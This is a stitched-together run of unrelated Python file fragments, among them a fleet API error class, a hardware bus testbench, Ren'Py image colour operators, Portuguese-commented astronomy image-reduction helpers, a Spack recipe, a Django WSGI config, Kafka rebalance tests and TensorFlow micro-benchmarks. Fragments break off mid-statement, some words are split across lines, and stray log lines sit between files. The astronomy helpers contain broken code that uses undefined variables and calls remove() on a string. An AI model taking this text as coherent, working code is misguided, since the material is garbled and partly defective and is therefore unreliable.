If you need access to the raw response, this is where you'll find it. """ def __init__(self, code, message, http_error): """Construct an exception representing an error returned by fleet Args: code (int): The response code message(str): The message included with the error response http_error(googleapic
lient.errors.HttpError): The underlying exception that caused this exception to be raised. """ self.code = code self.message = message self.http_error = http_error def __str__(self): # Return a string like r'Some bad thing happened(400)' return '{1} ({0})'.format( self.code, self.message ) def __repr__(self): # Retun a string like r'<Fleetv1Error; Code: 400; Message: Some bad thing happened>' return '<{0}; Code: {1}; Message: {2}>'.format( self.__class__.__name__, self.code, self.message )
# Copyright (C) 2018, Yu Sheng Lin, johnjohnlys@media.ee.ntu.edu.tw # This file is part of Nicotb. # Nicotb is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # Nicotb is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License # along with Nicotb. If not, see <http://www.gnu.org/licenses/>. from nicotb import * from nicotb.utils import Scoreboard, BusGetter from nicotb.protocol import Ahb import operator as op import numpy as np from os import getenv def main(): N = 10 scb = Scoreboard() test = scb.GetTest("ahb", ne=op.ne, max_err=10) bg = BusGetter(callbacks=[test.Get]) ms = Ahb.Master(hsel, haddr, hwrite, htrans, hsize, hburst, hready, hresp, rd, wd, ck_ev) yield rs_ev for i in range(10): yield ck_ev def rng(magic): while True: magic = (magic*199 + 12345) & 65535 yield magic r = rng(25251) MAGIC = next(r) ADR = 0 print( "Test Single R/W\n" f"MAGIC/ADR is {MAGIC}/{ADR}" ) test.Expect(MAGIC) yield from ms.Write(ADR, MAGIC) read_v = yield from ms.Read(ADR) test.Get(read_v) yield ck_ev MAGIC = next(r) ADR = 100 print( "Test Pipelined R/W\n" f"MAGIC/ADR is {MAGIC}/{ADR}" ) wcmd = [(True, ADR+i*4, MAGIC+i) for i in range(N)] rcmd = [(False, ADR+i*4) for i in range(N)] test.Expect([MAGIC+i for i in range(N)]) read_v = yield fr
om ms.IssueCommands(wcmd + rcmd) test.Get(read_v) yield ck_ev MAGIC = next(r) ADR = 200 print( "Test Pipelined Interleaved R/W\n" f"MAGIC/ADR is {MAGIC}/{ADR}" ) wcmd = [(True, ADR+i*4, MAGIC+i) for i in range(N)] rcmd = [(False, ADR+i*4) for i in range(N)] cmd = [v for p in zip(wcmd, rcmd) for v in p] test.Expect([MAGIC+i for i in range(N)]) read_v = yield from ms.IssueCommands(cmd) test.Get(read_v) for i in range(10): yield ck_ev wd, rd = CreateBu
ses([("wd",), ("rd",),]) hsel, haddr, hwrite, htrans, hsize, hburst, hready, hresp = CreateBuses([ (("u_dut", "HSEL"),), (("u_dut", "HADDR"),), (("u_dut", "HWRITE"),), (("u_dut", "HTRANS"),), (("u_dut", "HSIZE"),), (("u_dut", "HBURST"),), (("u_dut", "HREADY"),), (("u_dut", "HRESP"),), ]) ck_ev, rs_ev = CreateEvents(["ck_ev", "rst_out",]) RegisterCoroutines([ main(), ])
# Copyright 2012 Nebula, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # u
nder the License. from django import template from horizon.utils import html class Breadcrumb(html.HTMLElement): def __init__(self, request, template, root, subfolder_path, url, attr=None): super(Breadcrumb, self).__init__() self.template = template self.request = request self.root = root self.subfolder_path = subfolder_path self.url = url self._subfolders = [] def get_subfolders(self): if self.subfolder_path and not self._subfolders: (parent, slash, folder) = self.subfolder_path.strip('/') \ .rpartition('/') while folder: path = "%s%s%s/" % (parent, slash, folder) self._subfolders.insert(0, (folder, path)) (parent, slash, folder) = parent.rpartition('/') return self._subfolders def render(self): """Renders the table using the template from the table options.""" breadcrumb_template = template.loader.get_template(self.template) extra_context = {"breadcrumb": self} context = template.RequestContext(self.request, extra_context) return breadcrumb_template.render(context)
t character has the value end. Such a ramp can be used as a map argument of im.Map. """ rv = ramp_cache.get((start, end), None) if rv is None: chars = [ ] for i in range(0, 256): i = i / 255.0 chars.append(chr(int( end * i + start * (1.0 - i) ) ) ) rv = "".join(chars) ramp_cache[start, end] = rv return rv identity = ramp(0, 255) class Map(ImageBase): """ This adjusts the colors of the image that is its child. It takes as arguments 4 256 character strings. If a pixel channel has a value of 192, then the value of the 192nd character in the string is used for the mapped pixel component. """ def __init__(self, im, rmap=identity, gmap=identity, bmap=identity, amap=identity, force_alpha=False, **properties): im = image(im) super(Map, self).__init__(im, rmap, gmap, bmap, amap, force_alpha, **properties) self.image = im self.rmap = rmap self.gmap = gmap self.bmap = bmap self.amap = amap self.force_alpha = force_alpha def get_mtime(self): return self.image.get_mtime() def load(self): surf = cache.get(self.image) rv = renpy.display.pgrender.surface(surf.get_size
(), True) renpy.display.module.map(surf, rv, self.rmap, self.gmap, self.bmap, self.amap) return rv def predict_files(self): return self.image.predict_files() class Twocolor(Imag
eBase): """ This takes as arguments two colors, white and black. The image is mapped such that pixels in white have the white color, pixels in black have the black color, and shades of gray are linearly interpolated inbetween. The alpha channel is mapped linearly between 0 and the alpha found in the white color, the black color's alpha is ignored. """ def __init__(self, im, white, black, force_alpha=False, **properties): white = renpy.easy.color(white) black = renpy.easy.color(black) im = image(im) super(Twocolor, self).__init__(im, white, black, force_alpha, **properties) self.image = im self.white = white self.black = black self.force_alpha = force_alpha def get_mtime(self): return self.image.get_mtime() def load(self): surf = cache.get(self.image) rv = renpy.display.pgrender.surface(surf.get_size(), True) renpy.display.module.twomap(surf, rv, self.white, self.black) return rv def predict_files(self): return self.image.predict_files() class Recolor(ImageBase): """ This adjusts the colors of the image that is its child. It takes as an argument 4 numbers between 0 and 255, and maps each channel of the image linearly between 0 and the supplied color. """ def __init__(self, im, rmul=255, gmul=255, bmul=255, amul=255, force_alpha=False, **properties): im = image(im) super(Recolor, self).__init__(im, rmul, gmul, bmul, amul, force_alpha, **properties) self.image = im self.rmul = rmul + 1 self.gmul = gmul + 1 self.bmul = bmul + 1 self.amul = amul + 1 self.force_alpha = force_alpha def get_mtime(self): return self.image.get_mtime() def load(self): surf = cache.get(self.image) rv = renpy.display.pgrender.surface(surf.get_size(), True) renpy.display.module.linmap(surf, rv, self.rmul, self.gmul, self.bmul, self.amul) return rv def predict_files(self): return self.image.predict_files() class MatrixColor(ImageBase): """ :doc: im_matrixcolor An image operator that uses `matrix` to linearly transform the image manipulator `im`. `Matrix` should be a list, tuple, or :func:`im.matrix` that is 20 or 25 elements long. If the object has 25 elements, then elements past the 20th are ignored. When the four components of the source color are R, G, B, and A, which range from 0.0 to 1.0; the four components of the transformed color are R', G', B', and A', with the same range; and the elements of the matrix are named:: [ a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, r, s, t ] the transformed colors can be computed with the formula:: R' = (a * R) + (b * G) + (c * B) + (d * A) + e G' = (f * R) + (g * G) + (h * B) + (i * A) + j B' = (k * R) + (l * G) + (m * B) + (n * A) + o A' = (p * R) + (q * G) + (r * B) + (s * A) + t The components of the transformed color are clamped to the range [0.0, 1.0]. """ def __init__(self, im, matrix, **properties): im = image(im) if len(matrix) != 20 and len(matrix) != 25: raise Exception("ColorMatrix expects a 20 or 25 element matrix, got %d elements." % len(matrix)) matrix = tuple(matrix) super(MatrixColor, self).__init__(im, matrix, **properties) self.image = im self.matrix = matrix def get_mtime(self): return self.image.get_mtime() def load(self): surf = cache.get(self.image) rv = renpy.display.pgrender.surface(surf.get_size(), True) renpy.display.module.colormatrix(surf, rv, self.matrix) return rv def predict_files(self): return self.image.predict_files() class matrix(tuple): """ :doc: im_matrixcolor Constructs an im.matrix object from `matrix`. im.matrix objects support The operations supported are matrix multiplication, scalar multiplication, element-wise addition, and element-wise subtraction. These operations are invoked using the standard mathematical operators (\\*, \\*, +, and -, respectively). If two im.matrix objects are multiplied, matrix multiplication is performed, otherwise scalar multiplication is used. `matrix` is a 20 or 25 element list or tuple. If it is 20 elements long, it is padded with (0, 0, 0, 0, 1) to make a 5x5 matrix, suitable for multiplication. """ def __new__(cls, *args): if len(args) == 1: args = tuple(args[0]) if len(args) == 20: args = args + (0, 0, 0, 0, 1) if len(args) != 25: raise Exception("Matrix expects to be given 20 or 25 entries, not %d." % len(args)) return tuple.__new__(cls, args) def mul(self, a, b): if not isinstance(a, matrix): a = matrix(a) if not isinstance(b, matrix): b = matrix(b) result = [ 0 ] * 25 for y in range(0, 5): for x in range(0, 5): for i in range(0, 5): result[x + y * 5] += a[x + i * 5] * b[i + y * 5] return matrix(result) def scalar_mul(self, other): other = float(other) return matrix([ i * other for i in self ]) def vector_mul(self, o): return (o[0]*self[0] + o[1]*self[1] + o[2]*self[2] + o[3]*self[3] + self[4], o[0]*self[5] + o[1]*self[6] + o[2]*self[7] + o[3]*self[8] + self[9], o[0]*self[10] + o[1]*self[11] + o[2]*self[12] + o[3]*self[13] + self[14], o[0]*self[15] + o[1]*self[16] + o[2]*self[17] + o[3]*self[18] + self[19], 1) def __add__(self, other): if isinstance(other, (int, float)): other = float(other) return matrix([ i + other for i in self ]) other = matrix(other) return matrix([ i + j for i, j in zip(self, other)]) __radd__ = __add__ def __sub__(self, other): return self + other * -1 def __rsub__(self, other): return self * -1 + other def __mul__(self, other): if isinstance(other, (int, float)): return self.scalar_mul(other) return
#!/usr/bin/python # -*- coding: UTF-8 -*- """ Criado em 19 de Novembro de 2016 @author: Denis Varise Bernardes & Eder Martioli Descricao: esta biblioteca possui as seguintes funcoes: mkDir_saveCombinedImages: pela chamada da funcao LeArquivoReturnLista retorna a lista de todas as imagens adquiridas no ensaio; realiza a subtração entre cada par de imagens, salvando o resultado em um novo diretório 'Imagens_reduzidas' . Feito isso, a funcao cria uma lista com o nomes das novas imagens atraves da chamada da funcao criaArquivo_listaImagensCombinadas. readArqDetector: esta funcao recebe o nome do arquivo contendo os PAR2s do detector, retornando um vetor com os valores medidos. ImagemUnica_returnHeader: esta funcao recebe uma unica imagem da lista, retornando o header para a retirada de informacoes. LeArquivoReturnLista: esta funcao faz a leitura do arquivo listaImagens gerado pela funcao criaArq_listaImgInput, retornando uma lista com o nome das imagens. criaArquivo_listaImagensCombinadas: esta funcao cria um arquivo chamado listaImagensCombinadas contendo o nome das imagens combinadas geradas na funcao mkDir_saveCombinedImages. LeArqFluxoCamera: esta funcao faz a leitura do arquivo Fluxo camera.dat gerado pela funcao criaArqFluxoCamera, retornado dois vetores com os valores do fluxo e dos desvio padrao. LeArq_curvaCalibDetector: PAR2 o nome do arquivo da curva de calibracao do detector e o numero do conjunto de imagens, esta funcao retornara um vetor contendo os valores da curva caso a opcao seja fornecida; caso contrario, a funcao retorna um vetor contendo o valor 1. Laboratorio Nacional de Astrofisica, Brazil. """ __version__ = "1.0" __copyright__ = """ Copyright (c) ... All rights reserved. """ import astropy.io.fits as fits import numpy as np import os from sys import exit from math import sqrt from geraArquivo import geraArquivo def mkDir_saveCombinedImages(nImages, images_dir): print('Criando diretorio: Mediana das Imagens') #recebe uma lista de imagens de retorna um diretorio com as imagens combinadas lista = LeArquivoReturnLista('listaImagens', images_dir) n, i = 0, 0 VetorImagens = [] for i in range(len(lista)): if i%nImages == nImages-1: imagem = fits.getdata(images_dir + '\\' + lista[i]) VetorImagens.append(imagem) os.chdir(chdir) geraArquivo(VetorImagens, n) os.chdir(cwd) VetorImagens = [] n+=1 else: imagem = fits.getdata(images_dir + '\\' + lista[i]) VetorImagens.append(image
m) criaArquivo_listaImag
ensReduzidas() return def mkDir_ImgPair(tagPAR2, tagPAR1, ganho, images_dir): print('Criando diretorio: Imagens reduzidas') if not os.path.exists(images_dir + '\\' + 'Imagens_reduzidas'): os.makedirs(images_dir + '\\' + 'Imagens_reduzidas') chdir = images_dir + '\\' + 'Imagens_reduzidas' #recebe uma lista de imagens de retorna um diretorio com as imagens reduzidas de raios cosmicos e erro do shutter listaPAR2 = LeArquivoReturnLista(tagPAR2+'List.txt', images_dir) listaPAR1 = LeArquivoReturnLista(tagPAR1+'List.txt', images_dir) VetorImagens = [[],[]] i,n, string, VetorStdSignal = 0, 0, '', [] for i in range(len(listaPAR2)): imagemPAR2 = fits.getdata(images_dir + '\\' + listaPAR2[i])[0].astype(float) imagemPAR1 = fits.getdata(images_dir + '\\' + listaPAR1[i])[0].astype(float) imgReducePAR = imagemPAR2 - imagemPAR1 VetorStdSignal.append(sqrt(sum(sum(imagemPAR2 + imagemPAR1))*ganho)) os.chdir(chdir) if n < 10: string = '00%i'%(n) if 10 <= n < 100: string = '0%i'%(n) if n >= 100: string = '%i'%(n) print('ImagemReduzida%s.fits'%(string)) fits.writeto('ImagemReduzida_%s.fits'%(string),imgReducePAR, overwrite=True) os.chdir(images_dir) VetorImagens = [[],[]] n+=1 criaArquivo_StdDiffImagens(VetorStdSignal, images_dir) criaArquivo_listaImagensReduzidas(images_dir) return def readArqDetector(name, images_dir): valores=[] with open(images_dir + '\\' + name) as arq: Strvalores = arq.read().splitlines() for valor in Strvalores[1:]: valores.append(float(valor)) arq.close() return valores def ImagemUnica_returnHeader(tagPAR2, images_path): with open(images_path + '\\' + tagPAR2+'List.txt') as arq: imagem = arq.read().splitlines()[0].split(',')[0] arq.close() header = fits.getheader(images_path + '\\' + imagem) return header def LeArquivoReturnLista(arquivo, images_path): with open(images_path + '\\' + arquivo) as arq: lista = [] linhas = arq.read().splitlines() for lin in linhas: for img in lin.split(','): lista.append(img) arq.close() return lista def criaArquivo_listaImagensReduzidas(images_path): nome = images_path + '\Imagens_reduzidas\listaImagensReduzidas' try: File = open(nome,'w') except: nome.remove() File = open(nome,'w') listaImagemCombinada = os.listdir(images_path + '\Imagens_reduzidas') listaImagemCombinada.sort() for img in listaImagemCombinada: if '.fits' in img: File.write(img+'\n') File.close() def criaArquivo_StdDiffImagens(vetorStd, images_path): nome = images_path + '\\' + 'StdDiffImages' try: arq = open(nome,'w') except: nome.remove() arq = open(nome,'w') arq.write('-Desvio padrao das imagens reduzidas:\n') for std in vetorStd: arq.write(' \t\t ' + str(std) + '\n') arq.close() def LeArqFluxoCamera(images_path): vetorFluxoCamera, vetorSigmaBackground_Signal = [],[] with open(images_path + '\\' + 'Fluxo camera.dat') as arq: listaValores = arq.read().splitlines() for linha in listaValores[1:]: Fluxo_e_Sigma = linha.split('\t\t\t') vetorFluxoCamera.append(float(Fluxo_e_Sigma[0])) vetorSigmaBackground_Signal.append(float(Fluxo_e_Sigma[1])) return vetorFluxoCamera, vetorSigmaBackground_Signal def LeArq_curvaCalibFiltroDensidade(nome, numeroImagens, images_path): VetorPAR2s=[] if nome != '': with open(images_path + '\\' + nome) as arq: linhas = arq.read().splitlines() arq.close() for PAR2 in linhas[1:]: if PAR2 == '':continue VetorPAR2s.append(float(PAR2)) else: for i in range(numeroImagens): VetorPAR2s.append(1) return VetorPAR2s def LeArq_curvaEQFabricante(name, images_path): espectro, vetorEQ = [], [] with open(images_path + '\\' + name) as arq: linhas = arq.read().splitlines() arq.close() for linha in linhas: if linha == '':continue valores = linha.split('\t') espectro.append(float(valores[0])) vetorEQ.append(float(valores[1])) return vetorEQ, espectro
import os from .PBX_Base_Reference import * from ...Helpers import path_helper class PBXLibraryReference(PBX_Base_Reference): def __init__(self, lookup_func, dictionary, project, identifier): super(PBXLibraryReference, self).__init__(lookup_func, dictionary, project, identifier);
############################################################################## # Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC. # Produced at the Lawrence Livermore National Laboratory. # # This file is part of Spack. # Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved. # LLNL-CODE-647188 # # For details, see
https://github.com/llnl/spack # Please also see the NOTICE and LICENSE files for our notice and the LGPL. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License (as # published by the Free Software Founda
tion) version 2.1, February 1999. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and # conditions of the GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA ############################################################################## from spack import * class Fastqvalidator(MakefilePackage): """The fastQValidator validates the format of fastq files.""" homepage = "http://genome.sph.umich.edu/wiki/FastQValidator" url = "https://github.com/statgen/fastQValidator/archive/v0.1.1a.tar.gz" version('2017-01-10', commit='6d619a34749e9d33c34ef0d3e0e87324ca77f320', git='https://github.com/statgen/fastQValidator.git') resource( name='libStatGen', git='https://github.com/statgen/libStatGen.git', commit='9db9c23e176a6ce6f421a3c21ccadedca892ac0c' ) @property def build_targets(self): return ['LIB_PATH_GENERAL={0}'.format( join_path(self.stage.source_path, 'libStatGen'))] @property def install_targets(self): return [ 'INSTALLDIR={0}'.format(self.prefix.bin), 'LIB_PATH_GENERAL={0}'.format( join_path(self.stage.source_path, 'libStatGen')), 'install' ]
""" WSGI config for server project. It ex
poses the WSGI callable as a module-level variable named ``application``. For more information on this file, see https://docs.djangoproject.com/en/1.7/howto/deployment/wsgi/ """ import os os.environ.setdefault("DJANGO_SETTINGS_MODULE", "server.settings") from django.core.wsgi import get_wsgi_application application = get_ws
gi_application()
00000
0 output
/lattice.py.err 32074 1 output/lattice.py.out
# Verify leader-balanced assert new_leader_imbal == 0 # Verify partitions-changed assignment assert new_leaders_per_broker['0'] == 1 assert new_leaders_per_broker['1'] == 1 assert new_leaders_per_broker['2'] == 1 def test_rebalance_leaders_unbalanced_case2( self, create_balancer, create_cluster_topology, ): # (Broker: leader-count): {0: 2, 1: 1, 2:0} # opt-count: 3/3 = 1, extra-count = 0 # Leader-imbalance-value: 1 assignment = dict( [ ((u'T0', 0), ['1', '2']), ((u'T1', 1), ['0', '1']), ((u'T1', 0), ['0']), ] ) ct = create_cluster_topology(assignment, broker_range(3)) cb = create_balancer(ct) cb.rebalance_leaders() # Verify leader-balanced leader_imbal = get_net_imbalance( get_broker_leader_counts(ct.brokers.values()), ) assert leader_imbal == 0 def test_rebalance_leaders_unbalanced_case2a( self, create_balancer, create_cluster_topology, ): # (Broker: leader-count): {0: 2, 1: 1, 2:0, 3:1} # opt-count: 3/4 = 1, extra-count = 3 # Leader-imbalance-value: 1 # imbalanced-broker: 0,2; balanced-brokers: 1,3 assignment = dict( [ ((u'T0', 0), ['3', '2']), ((u'T0', 1), ['1', '3']), ((u'T1', 1), ['0', '1']), ((u'T1', 0), ['0']), ] ) ct = create_cluster_topology(assignment, broker_range(4)) cb = create_balancer(ct) cb.rebalance_leaders() # Verify balanced leader_imbal = get_net_imbalance( get_broker_leader_counts(ct.brokers.values()), ) assert leader_imbal == 0 # Verify that (T0, 1) also swapped even if 1 and 3 were balanced # Rebalancing through non-followers replica_ids = [b.id for b in ct.partitions[('T0', 1)].replicas] assert replica_ids == ['3', '1'] def test_rebalance_leaders_unbalanced_case2b( self, create_balancer, create_cluster_topology, ): assignment = dict( [ ((u'T0', 0), ['3', '2']), ((u'T1', 0), ['1', '2']), ((u'T1', 1), ['0', '1']), ((u'T2', 0), ['0']), ] )
ct = create_cluster_topology
(assignment, broker_range(4)) cb = create_balancer(ct) cb.rebalance_leaders() # Verify balanced leader_imbal = get_net_imbalance( get_broker_leader_counts(ct.brokers.values()), ) assert leader_imbal == 0 def test_rebalance_leaders_unbalanced_case2c( self, create_balancer, create_cluster_topology, ): # Broker-2 imbalance value: 2 with different brokers # Broker-2 requests leadership from multiple brokers (0, 1) once assignment = dict( [ ((u'T1', 0), ['1', '2']), ((u'T1', 1), ['0', '1']), ((u'T2', 0), ['0']), ((u'T2', 1), ['0']), ((u'T3', 0), ['3', '2']), ((u'T3', 1), ['1', '3']), ((u'T4', 0), ['1']), ((u'T4', 2), ['3']), ] ) ct = create_cluster_topology(assignment, broker_range(4)) cb = create_balancer(ct) cb.rebalance_leaders() # Verify leader-balanced leader_imbal = get_net_imbalance( get_broker_leader_counts(ct.brokers.values()), ) assert leader_imbal == 0 def test_rebalance_leaders_unbalanced_case2d( self, create_balancer, create_cluster_topology, ): # Broker-2 imbalanced with same brokers # Broker-2 requests leadership from same broker-1 twice assignment = dict( [ ((u'T1', 0), ['1', '2']), ((u'T1', 1), ['0', '1']), ((u'T1', 2), ['0']), ((u'T1', 3), ['1', '2']), ((u'T1', 4), ['0', '1']), ((u'T1', 5), ['0']), ] ) ct = create_cluster_topology(assignment, broker_range(3)) cb = create_balancer(ct) cb.rebalance_leaders() # Verify leader-balanced leader_imbal = get_net_imbalance( get_broker_leader_counts(ct.brokers.values()), ) assert leader_imbal == 0 def test_rebalance_leaders_unbalanced_case2e( self, create_balancer, create_cluster_topology, ): # Imbalance-val 2 # Multiple imbalanced brokers (2, 5) gets non-follower balanced # from multiple brokers (1,4) assignment = dict( [ ((u'T1', 0), ['1', '2']), ((u'T1', 1), ['0', '1']), ((u'T2', 0), ['0']), ((u'T3', 0), ['4', '5']), ((u'T3', 1), ['3', '4']), ((u'T4', 0), ['3']), ] ) ct = create_cluster_topology(assignment, broker_range(6)) cb = create_balancer(ct) cb.rebalance_leaders() # Verify leader-balanced leader_imbal = get_net_imbalance( get_broker_leader_counts(ct.brokers.values()), ) assert leader_imbal == 0 def test_rebalance_leaders_unbalanced_case3( self, create_balancer, create_cluster_topology, ): # Imbalanced 0 and 2. No re-balance possible. assignment = dict( [ ((u'T1', 0), ['1', '2']), ((u'T1', 1), ['0']), ((u'T2', 0), ['0']), ] ) ct = create_cluster_topology(assignment, broker_range(3)) cb = create_balancer(ct) cb.rebalance_leaders() # Verify still leader-imbalanced leader_imbal = get_net_imbalance( get_broker_leader_counts(ct.brokers.values()), ) assert leader_imbal == 1 # No change in assignment assert sorted(ct.assignment) == sorted(assignment) def test_rebalance_leaders_unbalanced_case4( self, create_balancer, create_cluster_topology, ): # Imbalanced assignment # Partial leader-imbalance possible # (Broker: leader-count): {0: 3, 1: 1, 2:0} # opt-count: 5/3 = 1, extra-count = 2 assignment = dict( [ ((u'T0', 0), ['1', '2']), ((u'T0', 1), ['0', '2']), ((u'T1', 0), ['0']), ((u'T1', 1), ['0']), ((u'T1', 2), ['0']), ] ) ct = create_cluster_topology(assignment, broker_range(3)) net_imbal = get_net_imbalance( get_broker_leader_counts(ct.brokers.values()), ) cb = create_balancer(ct) cb.rebalance_leaders() new_leaders_per_broker = { broker.id: broker.count_preferred_replica() for broker in ct.brokers.itervalues() } new_net_imbal = get_net_imbalance(new_leaders_per_broker.values()) # Verify that net-imbalance has reduced but not zero assert new_net_imbal > 0 and new_net_imbal < net_imbal # Verify the changes in leaders-per-broker count assert new_leaders_per_broker['2'] == 1 assert new_leaders_per_broker['1'] == 1 assert new_leaders_per_broker['0'] == 3 def test_rebalance_leaders_unbalanced_case2f( self, create_balancer, create_cluster_topology, ): assignment = dict( [ ((u'T0', 0), ['2', '0']), ((u'T1', 0), ['2', '0']), ((u'T1', 1), ['0']), ((u'T2', 0), ['1']), ((u'T2', 1), ['2']), ] ) ct = create_cluster_topology(assignment, broker_range(3)) cb = create_balancer(c
# Copyright 2020 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== # Lint as: python3 r"""Micro benchmark.
bazel run -c opt --config=cuda \ //third_party/tensorflow/python/ops/numpy_ops/benchmarks:micro_benchmarks -- \ --number=100 --repeat=100 \ --benchmarks=. """ from __future__ import absolute_import fro
m __future__ import division from __future__ import print_function import gc import time from absl import flags from absl import logging import numpy as np # pylint: disable=unused-import import tensorflow.compat.v2 as tf from tensorflow.python.ops import numpy_ops as tfnp # pylint: disable=g-direct-tensorflow-import from tensorflow.python.ops.numpy_ops.integration_test.benchmarks import numpy_mlp from tensorflow.python.ops.numpy_ops.integration_test.benchmarks import tf_numpy_mlp FLAGS = flags.FLAGS flags.DEFINE_integer('repeat', 100, '#Measurements per benchmark.') flags.DEFINE_integer('number', 100, '#Runs per a measure.') class MicroBenchmarks(tf.test.Benchmark): """Main micro benchmark class.""" def _benchmark_and_report( self, name, fn, repeat=None, number=None): """Run fn repeat * number times, report time, and return fastest time.""" # Can't make these default above since the flags may not have been parsed # at module import time. repeat = repeat or int(FLAGS.repeat) number = number or int(FLAGS.number) # Warmup fn() times = [] for _ in range(repeat): gc.disable() start = time.time() for _ in range(number): fn() times.append(time.time() - start) gc.enable() gc.collect() # Regular benchmark to report numbers. fastest_time_us = min(times) * 1e6 / number total_time = sum(times) self.report_benchmark(name=name, wall_time=total_time, extras={'fastest_time_us': fastest_time_us}) return fastest_time_us def benchmark_tf_np_mlp_inference_batch_1_cpu(self): with tf.device('/CPU:0'): model = tf_numpy_mlp.MLP() x = tfnp.ones(shape=(1, 10)).astype(np.float32) self._benchmark_and_report(self._get_name(), lambda: model.inference(x)) def benchmark_tf_np_tf_function_mlp_inference_batch_1_cpu(self): with tf.device('/CPU:0'): model = tf_numpy_mlp.MLP() x = tfnp.ones(shape=(1, 10)).astype(np.float32) self._benchmark_and_report( self._get_name(), tf.function(lambda: model.inference(x))) def benchmark_numpy_mlp_inference_batch_1_cpu(self): model = numpy_mlp.MLP() x = np.random.uniform(size=(1, 10)).astype(np.float32, copy=False) self._benchmark_and_report(self._get_name(), lambda: model.inference(x)) def _benchmark_np_and_tf_np(self, name, op, args, repeat=None): # pylint: disable=redefined-builtin fn = getattr(np, op) assert fn is not None np_time = self._benchmark_and_report( '{}_numpy'.format(name), lambda: fn(*args), repeat=repeat) fn = getattr(tfnp, op) assert fn is not None with tf.device('CPU:0'): tf_time = self._benchmark_and_report( '{}_tfnp_cpu'.format(name), lambda: fn(*args), repeat=repeat) return np_time, tf_time def _print_times(self, op, sizes, times): # For easy reporting. print('For np.{}:'.format(op)) print('{:<15} {:>11} {:>11}'.format('Size', 'NP time', 'TF NP Time')) for size, (np_time, tf_time) in zip(sizes, times): print('{:<15} {:>10.5}us {:>10.5}us'.format( str(size), np_time, tf_time)) print() def _benchmark_np_and_tf_np_unary(self, op): sizes = [(100,), (10000,), (1000000,)] repeats = [FLAGS.repeat] * 2 + [10] times = [] for size, repeat in zip(sizes, repeats): x = np.random.uniform(size=size).astype(np.float32, copy=False) name = '{}_{}'.format(self._get_name(), size) times.append(self._benchmark_np_and_tf_np(name, op, (x,), repeat)) self._print_times(op, sizes, times) def benchmark_count_nonzero(self): self._benchmark_np_and_tf_np_unary('count_nonzero') def benchmark_log(self): self._benchmark_np_and_tf_np_unary('log') def benchmark_exp(self): self._benchmark_np_and_tf_np_unary('exp') def benchmark_tanh(self): self._benchmark_np_and_tf_np_unary('tanh') def benchmark_matmul(self): sizes = [(2, 2), (10, 10), (100, 100), (200, 200), (1000, 1000)] # Override repeat flag since this can be very slow. repeats = [FLAGS.repeat] * 3 + [50, 10] times = [] for size, repeat in zip(sizes, repeats): x = np.random.uniform(size=size).astype(np.float32, copy=False) name = '{}_{}'.format(self._get_name(), size) times.append( self._benchmark_np_and_tf_np(name, 'matmul', (x, x), repeat=repeat)) self._print_times('matmul', sizes, times) if __name__ == '__main__': logging.set_verbosity(logging.WARNING) tf.enable_v2_behavior() tf.test.main()